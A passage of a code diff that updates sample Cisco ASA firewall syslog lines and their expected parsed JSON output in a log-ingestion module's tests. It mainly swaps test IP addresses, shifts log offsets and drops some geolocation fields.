+Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 81.2.69.143, IP = 81.2.69.143, Security negotiation complete for LAN-to-LAN Group (81.2.69.143) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d
+Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 81.2.69.143, Username = 81.2.69.143, IP = 81.2.69.143, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested
 Apr 27 02:03:03 dev01: %ASA-4-722051: Group <VPN5Policy> User <john> IP <192.168.50.3> IPv4 Address <192.168.50.5> IPv6 address <::> assigned to session
-Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 8.8.8.8 WebVPN session terminated: User Requested.
+Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 175.16.199.1 WebVPN session terminated: User Requested.
 Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User alice IP 192.168.50.1 WebVPN session terminated: Idle timeout.
-Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 104.46.88.19/6370 to outside:195.74.114.34/23
-Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:91.240.17.178/8888 to destinationInterfaceName:192.168.2.2/123123 locally
-Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:91.240.17.138/8888 to destinationInterfaceName:192.168.2.2/514514
-Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:91.240.17.178/7777 to 192.168.2.2/123412
-Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:91.240.17.178/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number
-Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been created.
-Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been deleted.
-Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request
-Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database
-Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.128.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)
-Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.64.157.61, Duplicate first packet detected. Ignoring packet.
-Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!
+Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 67.43.156.13/6370 to outside:195.74.114.34/23
+Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:81.2.69.143/8888 to destinationInterfaceName:192.168.2.2/123123 locally
+Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:67.43.156.15/8888 to destinationInterfaceName:192.168.2.2/514514
+Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:81.2.69.143/7777 to 192.168.2.2/123412
+Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:81.2.69.143/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number
+Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.143 and 192.168.2.2 (user= admin) has been created.
+Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.143 and 192.168.2.2 (user= admin) has been deleted.
+Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:81.2.69.143:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request
+Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:81.2.69.143:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database
+Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 67.43.156.12, PHASE 2 COMPLETED (msgid=bbe383e88)
+Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 1.128.3.4, Duplicate first packet detected. Ignoring packet.
+Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 67.43.156.12, All IPSec SA proposals found unacceptable!
 Apr 27 2020 02:03:03 dev01: %ASA-6-713904: All IPSec SA proposals found unacceptable!
-Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.128.1.1, All IPSec SA proposals found unacceptable!
+Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 67.43.156.12, All IPSec SA proposals found unacceptable!
 Apr 27 2020 02:03:03 dev01: %ASA-6-713902: Group = 100.60.140.10, All IPSec SA proposals found unacceptable!
-Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!
-Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 100.60.140.10, Username = test_user, IP = 1.2.3.4, Security negotiation complete for User (test_user) Responder, Inbound SPI = 0x0000000, Outbound SPI = 0x0000000
+Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 67.43.156.12, All IPSec SA proposals found unacceptable!
+Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 100.60.140.10, Username = test_user, IP = 81.2.69.143, Security negotiation complete for User (test_user) Responder, Inbound SPI = 0x0000000, Outbound SPI = 0x0000000
 Apr 27 2020 02:03:03 dev01: %ASA-4-106023: Deny protocol 47 src outside:100.66.124.24 dst inside:172.31.98.44 by access-group "inbound"
-Apr 27 2020 02:03:03 dev01: %ASA-4-106023: Deny icmp src OUTSIDE:2a05:d016:add:4002:91f2:a9b2:e09a:6fc6 dst OUTSIDE:fe00:afa0::1 (type 128, code 0) by access-group "OUTSIDE_in"
-Apr 27 2020 02:03:03 dev01: %ASA-4-302016: Teardown UDP connection 123364823 for OUTSIDE:82.0.0.1/500 to identity:85.0.0.1/500 duration 92:24:20 bytes 4671944
+Apr 27 2020 02:03:03 dev01: %ASA-4-106023: Deny icmp src OUTSIDE:2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 dst OUTSIDE:fe00:afa0::1 (type 128, code 0) by access-group "OUTSIDE_in"
+Apr 27 2020 02:03:03 dev01: %ASA-4-302016: Teardown UDP connection 123364823 for OUTSIDE:67.43.156.13/500 to identity:1.128.3.4/500 duration 92:24:20 bytes 4671944
 May  5 19:02:25 dev01: %ASA-4-733100: [ Scanning] drop rate-2 exceeded. Current burst rate is 0 per second, max configured rate is 8; Current average rate is 5 per second, max configured rate is 4; Cumulative total count is 19269
 May  5 19:02:25 dev01: %ASA-4-733100: [   192.168.0.1] drop rate-1 exceeded. Current burst rate is 0 per second, max configured rate is 10; Current average rate is 5 per second, max configured rate is 5; Cumulative total count is 6018
 May  5 19:02:25 dev01: %ASA-4-733100: [     Port-5432 5432] drop rate-1 exceeded. Current burst rate is 8 per second, max configured rate is 10; Current average rate is 20 per second, max configured rate is 5; Cumulative total count is 12466
diff --git a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json
index 28b937e6bdff..ca9623da72a6 100644
--- a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json
+++ b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json
@@ -4,7 +4,7 @@
         "cisco.asa.destination_interface": "fw111",
         "cisco.asa.mapped_destination_ip": "8.8.5.4",
         "cisco.asa.mapped_destination_port": 53500,
-        "cisco.asa.mapped_source_ip": "8.8.8.8",
+        "cisco.asa.mapped_source_ip": "175.16.199.1",
         "cisco.asa.mapped_source_port": 53500,
         "cisco.asa.message_id": "302013",
         "cisco.asa.source_interface": "net",
@@ -20,7 +20,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)",
+        "event.original": "%FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (175.16.199.1/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -46,14 +46,14 @@
         ],
         "related.ip": [
             "10.10.10.10",
+            "175.16.199.1",
             "192.168.2.2",
-            "8.8.5.4",
-            "8.8.8.8"
+            "8.8.5.4"
         ],
         "service.type": "cisco",
         "source.address": "10.10.10.10",
         "source.ip": "10.10.10.10",
-        "source.nat.ip": "8.8.8.8",
+        "source.nat.ip": "175.16.199.1",
         "source.port": 53500,
         "tags": [
             "cisco-asa",
@@ -65,7 +65,7 @@
         "cisco.asa.destination_interface": "fw111",
         "cisco.asa.mapped_destination_ip": "8.8.5.4",
         "cisco.asa.mapped_destination_port": 53500,
-        "cisco.asa.mapped_source_ip": "8.8.8.8",
+        "cisco.asa.mapped_source_ip": "175.16.199.1",
         "cisco.asa.mapped_source_port": 53500,
         "cisco.asa.message_id": "302015",
         "cisco.asa.source_interface": "net",
@@ -81,7 +81,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)",
+        "event.original": "%FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (175.16.199.1/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -91,7 +91,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 162,
+        "log.offset": 167,
         "network.community_id": "1:IVpSg0ysDmubwwgwjXBIZ47C7h0=",
         "network.direction": "inbound",
         "network.iana_number": 17,
@@ -107,14 +107,14 @@
         ],
         "related.ip": [
             "10.10.10.10",
+            "175.16.199.1",
             "192.168.2.2",
-            "8.8.5.4",
-            "8.8.8.8"
+            "8.8.5.4"
         ],
         "service.type": "cisco",
         "source.address": "10.10.10.10",
         "source.ip": "10.10.10.10",
-        "source.nat.ip": "8.8.8.8",
+        "source.nat.ip": "175.16.199.1",
         "source.port": 53500,
         "tags": [
             "cisco-asa",
@@ -124,7 +124,7 @@
     {
         "cisco.asa.icmp_code": 3,
         "cisco.asa.icmp_type": 3,
-        "cisco.asa.mapped_source_ip": "8.8.8.8",
+        "cisco.asa.mapped_source_ip": "175.16.199.1",
         "cisco.asa.message_id": "302020",
         "destination.address": "10.10.10.10",
         "destination.ip": "10.10.10.10",
@@ -136,7 +136,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3",
+        "event.original": "%FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 175.16.199.1/0 laddr 192.168.2.2/0 type 3 code 3",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -147,7 +147,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 324,
+        "log.offset": 334,
         "network.direction": "inbound",
         "network.protocol": "icmp",
         "observer.hostname": "dev01",
@@ -159,13 +159,13 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "192.168.2.2",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.2"
         ],
         "service.type": "cisco",
         "source.address": "192.168.2.2",
         "source.ip": "192.168.2.2",
-        "source.nat.ip": "8.8.8.8",
+        "source.nat.ip": "175.16.199.1",
         "tags": [
             "cisco-asa",
             "forwarded"
@@ -196,7 +196,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "debug",
-        "log.offset": 466,
+        "log.offset": 481,
         "observer.hostname": "dev01",
         "observer.ingress.interface.name": "net",
         "observer.product": "asa",
@@ -238,7 +238,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "debug",
-        "log.offset": 557,
+        "log.offset": 572,
         "observer.hostname": "dev01",
         "observer.ingress.interface.name": "net",
         "observer.product": "asa",
@@ -261,7 +261,7 @@
     {
         "cisco.asa.icmp_code": 1,
         "cisco.asa.icmp_type": 3,
-        "cisco.asa.mapped_source_ip": "8.8.8.8",
+        "cisco.asa.mapped_source_ip": "175.16.199.1",
         "cisco.asa.message_id": "302020",
         "destination.address": "10.10.10.10",
         "destination.ip": "10.10.10.10",
@@ -273,7 +273,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 1",
+        "event.original": "%FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 175.16.199.1/0 laddr 192.168.2.2/0 type 3 code 1",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -284,7 +284,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 628,
+        "log.offset": 643,
         "network.direction": "inbound",
         "network.protocol": "icmp",
         "observer.hostname": "dev01",
@@ -296,13 +296,13 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "192.168.2.2",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.2"
         ],
         "service.type": "cisco",
         "source.address": "192.168.2.2",
         "source.ip": "192.168.2.2",
-        "source.nat.ip": "8.8.8.8",
+        "source.nat.ip": "175.16.199.1",
         "tags": [
             "cisco-asa",
             "forwarded"
@@ -313,7 +313,7 @@
         "cisco.asa.destination_interface": "fw111",
         "cisco.asa.mapped_destination_ip": "8.8.5.4",
         "cisco.asa.mapped_destination_port": 111,
-        "cisco.asa.mapped_source_ip": "8.8.8.8",
+        "cisco.asa.mapped_source_ip": "175.16.199.1",
         "cisco.asa.mapped_source_port": 111,
         "cisco.asa.message_id": "805001",
         "cisco.asa.source_interface": "fw111",
@@ -329,7 +329,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (8.8.8.8/111) to fw111:192.168.2.2/111 (8.8.5.4/111)",
+        "event.original": "%FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (175.16.199.1/111) to fw111:192.168.2.2/111 (8.8.5.4/111)",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -339,7 +339,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 770,
+        "log.offset": 790,
         "network.community_id": "1:fZKugXq2jG4PzddJfuy6XDBSNb4=",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -354,14 +354,14 @@
         ],
         "related.ip": [
             "10.10.10.10",
+            "175.16.199.1",
             "192.168.2.2",
-            "8.8.5.4",
-            "8.8.8.8"
+            "8.8.5.4"
         ],
         "service.type": "cisco",
         "source.address": "10.10.10.10",
         "source.ip": "10.10.10.10",
-        "source.nat.ip": "8.8.8.8",
+        "source.nat.ip": "175.16.199.1",
         "source.port": 111,
         "tags": [
             "cisco-asa",
@@ -398,7 +398,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 932,
+        "log.offset": 957,
         "network.community_id": "1:RAjPAJDWj8kCZQnmEJzqMl9E6h8=",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -450,7 +450,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "debug",
-        "log.offset": 1119,
+        "log.offset": 1144,
         "network.community_id": "1:7GE6gaRtd6w4KEJWhDLHwfgp1Do=",
         "network.iana_number": 17,
         "network.transport": "udp",
@@ -502,7 +502,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 1223,
+        "log.offset": 1248,
         "network.protocol": "ftp",
         "observer.egress.interface.name": "fw111",
         "observer.hostname": "dev01",
@@ -546,7 +546,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "debug",
-        "log.offset": 1396,
+        "log.offset": 1421,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -571,7 +571,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 8.8.8.8/10872.",
+        "event.original": "%FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 175.16.199.1/10872.",
         "event.severity": 4,
         "event.timezone": "-02:00",
         "event.type": [
@@ -581,7 +581,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 1492,
+        "log.offset": 1517,
         "network.iana_number": 1,
         "network.transport": "icmp",
         "observer.hostname": "dev01",
@@ -601,7 +601,7 @@
     {
         "cisco.asa.icmp_code": 0,
         "cisco.asa.icmp_type": 8,
-        "cisco.asa.mapped_source_ip": "8.8.8.8",
+        "cisco.asa.mapped_source_ip": "175.16.199.1",
         "cisco.asa.message_id": "302021",
         "destination.address": "192.168.2.2",
         "destination.ip": "192.168.2.2",
@@ -613,7 +613,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 8.8.8.8/2 laddr 10.10.10.10/2 type 8 code 0",
+        "event.original": "%ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 175.16.199.1/2 laddr 10.10.10.10/2 type 8 code 0",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -624,7 +624,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 1722,
+        "log.offset": 1752,
         "network.community_id": "1:adLbp2MSbpgtKlYEN938sSARKPs=",
         "network.iana_number": 1,
         "network.transport": "icmp",
@@ -637,13 +637,13 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "192.168.2.2",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.2"
         ],
         "service.type": "cisco",
         "source.address": "10.10.10.10",
         "source.ip": "10.10.10.10",
-        "source.nat.ip": "8.8.8.8",
+        "source.nat.ip": "175.16.199.1",
         "tags": [
             "cisco-asa",
             "forwarded"
@@ -671,7 +671,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "debug",
-        "log.offset": 1859,
+        "log.offset": 1894,
         "observer.hostname": "dev01",
         "observer.ingress.interface.name": "net",
         "observer.product": "asa",
@@ -716,7 +716,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "debug",
-        "log.offset": 1930,
+        "log.offset": 1965,
         "observer.hostname": "dev01",
         "observer.ingress.interface.name": "identity",
         "observer.product": "asa",
@@ -737,7 +737,7 @@
         ]
     },
     {
-        "cisco.asa.mapped_source_ip": "8.8.8.8",
+        "cisco.asa.mapped_source_ip": "175.16.199.1",
         "cisco.asa.message_id": "302020",
         "destination.address": "10.10.10.10",
         "destination.ip": "10.10.10.10",
@@ -749,7 +749,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 10.192.46.90/0",
+        "event.original": "%ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 175.16.199.1/0 laddr 10.192.46.90/0",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -760,7 +760,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 2026,
+        "log.offset": 2061,
         "network.direction": "inbound",
         "network.protocol": "icmp",
         "observer.hostname": "dev01",
@@ -773,12 +773,12 @@
         "related.ip": [
             "10.10.10.10",
             "10.192.46.90",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "source.address": "10.192.46.90",
         "source.ip": "10.192.46.90",
-        "source.nat.ip": "8.8.8.8",
+        "source.nat.ip": "175.16.199.1",
         "tags": [
             "cisco-asa",
             "forwarded"
@@ -787,7 +787,7 @@
     {
         "cisco.asa.icmp_code": 3,
         "cisco.asa.icmp_type": 3,
-        "cisco.asa.mapped_source_ip": "8.8.8.8",
+        "cisco.asa.mapped_source_ip": "175.16.199.1",
         "cisco.asa.message_id": "302020",
         "destination.address": "10.10.10.10",
         "destination.ip": "10.10.10.10",
@@ -799,7 +799,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3",
+        "event.original": "%ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 175.16.199.1/0 laddr 192.168.2.2/0 type 3 code 3",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -810,7 +810,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 2155,
+        "log.offset": 2195,
         "network.direction": "outbound",
         "network.protocol": "icmp",
         "observer.hostname": "dev01",
@@ -822,13 +822,13 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "192.168.2.2",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.2"
         ],
         "service.type": "cisco",
         "source.address": "192.168.2.2",
         "source.ip": "192.168.2.2",
-        "source.nat.ip": "8.8.8.8",
+        "source.nat.ip": "175.16.199.1",
         "tags": [
             "cisco-asa",
             "forwarded"
@@ -865,7 +865,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 2298,
+        "log.offset": 2343,
         "network.bytes": 0,
         "network.community_id": "1:4wndP8OTPk0tlCwv5mj9vURDLQ0=",
         "network.iana_number": 6,
@@ -895,15 +895,15 @@
     {
         "cisco.asa.connection_id": "1588662",
         "cisco.asa.destination_interface": "net",
-        "cisco.asa.mapped_destination_ip": "8.8.8.8",
+        "cisco.asa.mapped_destination_ip": "175.16.199.1",
         "cisco.asa.mapped_destination_port": 54839,
-        "cisco.asa.mapped_source_ip": "8.8.8.8",
+        "cisco.asa.mapped_source_ip": "175.16.199.1",
         "cisco.asa.mapped_source_port": 80,
         "cisco.asa.message_id": "302013",
         "cisco.asa.source_interface": "intfacename",
         "destination.address": "10.10.10.10",
         "destination.ip": "10.10.10.10",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.nat.ip": "175.16.199.1",
         "destination.port": 54839,
         "event.action": "firewall-rule",
         "event.category": [
@@ -913,7 +913,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (8.8.8.8/80) to net:10.10.10.10/54839 (8.8.8.8/54839)",
+        "event.original": "%ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (175.16.199.1/80) to net:10.10.10.10/54839 (175.16.199.1/54839)",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -923,7 +923,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 2462,
+        "log.offset": 2507,
         "network.community_id": "1:N0ZlFq5yxkndvN9h3uigv6XgVms=",
         "network.direction": "outbound",
         "network.iana_number": 6,
@@ -939,13 +939,13 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "192.168.2.2",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.2"
         ],
         "service.type": "cisco",
         "source.address": "192.168.2.2",
         "source.ip": "192.168.2.2",
-        "source.nat.ip": "8.8.8.8",
+        "source.nat.ip": "175.16.199.1",
         "source.port": 80,
         "tags": [
             "cisco-asa",
@@ -981,7 +981,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 2623,
+        "log.offset": 2678,
         "network.community_id": "1:PyQWTuzAdzYav2//+TQFcJTt2os=",
         "network.iana_number": 17,
         "network.transport": "udp",
@@ -1033,7 +1033,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 2768,
+        "log.offset": 2823,
         "network.community_id": "1:adLbp2MSbpgtKlYEN938sSARKPs=",
         "network.iana_number": 1,
         "network.transport": "icmp",
@@ -1082,7 +1082,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 2904,
+        "log.offset": 2959,
         "network.community_id": "1:hoENwaIuofrQAf7gW+y4f0XXbxc=",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -1134,7 +1134,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "critical",
-        "log.offset": 3029,
+        "log.offset": 3084,
         "network.community_id": "1:+xI89PlchTpu6dxTMHpkmkd99Ns=",
         "network.direction": "inbound",
         "network.iana_number": 6,
@@ -1166,16 +1166,6 @@
         "cisco.asa.message_id": "302016",
         "cisco.asa.source_interface": "intfacename",
         "destination.address": "192.186.2.2",
-        "destination.as.number": 395776,
-        "destination.as.organization.name": "FEDERAL ONLINE GROUP LLC",
-        "destination.geo.city_name": "Thousand Oaks",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 34.197,
-        "destination.geo.location.lon": -118.8199,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "192.186.2.2",
         "destination.port": 53356,
         "event.action": "flow-expiration",
@@ -1200,7 +1190,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "critical",
-        "log.offset": 3172,
+        "log.offset": 3227,
         "network.bytes": 64585,
         "network.community_id": "1:eOIoJBMMmanddR7cRZ0I9vTVI7o=",
         "network.iana_number": 17,
@@ -1230,7 +1220,7 @@
     {
         "cisco.asa.connection_id": "1743372",
         "cisco.asa.destination_interface": "net",
-        "cisco.asa.mapped_destination_ip": "8.8.8.8",
+        "cisco.asa.mapped_destination_ip": "175.16.199.1",
         "cisco.asa.mapped_destination_port": 22638,
         "cisco.asa.mapped_source_ip": "8.8.8.4",
         "cisco.asa.mapped_source_port": 161,
@@ -1238,7 +1228,7 @@
         "cisco.asa.source_interface": "intfacename",
         "destination.address": "192.168.2.2",
         "destination.ip": "192.168.2.2",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.nat.ip": "175.16.199.1",
         "destination.port": 22638,
         "event.action": "firewall-rule",
         "event.category": [
@@ -1248,7 +1238,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638)",
+        "event.original": "%ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (175.16.199.1/22638)",
         "event.severity": 2,
         "event.timezone": "-02:00",
         "event.type": [
@@ -1258,7 +1248,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "critical",
-        "log.offset": 3328,
+        "log.offset": 3383,
         "network.community_id": "1:QsMj86uzy+H1c1pPwrevpSOTh6Q=",
         "network.direction": "outbound",
         "network.iana_number": 17,
@@ -1274,9 +1264,9 @@
         ],
         "related.ip": [
             "10.10.10.10",
+            "175.16.199.1",
             "192.168.2.2",
-            "8.8.8.4",
-            "8.8.8.8"
+            "8.8.8.4"
         ],
         "service.type": "cisco",
         "source.address": "10.10.10.10",
@@ -1291,7 +1281,7 @@
     {
         "cisco.asa.connection_id": "1743372",
         "cisco.asa.destination_interface": "net",
-        "cisco.asa.mapped_destination_ip": "8.8.8.8",
+        "cisco.asa.mapped_destination_ip": "175.16.199.1",
         "cisco.asa.mapped_destination_port": 22638,
         "cisco.asa.mapped_source_ip": "8.8.8.4",
         "cisco.asa.mapped_source_port": 161,
@@ -1299,7 +1289,7 @@
         "cisco.asa.source_interface": "intfacename",
         "destination.address": "192.168.2.2",
         "destination.ip": "192.168.2.2",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.nat.ip": "175.16.199.1",
         "destination.port": 22638,
         "event.action": "firewall-rule",
         "event.category": [
@@ -1309,7 +1299,7 @@
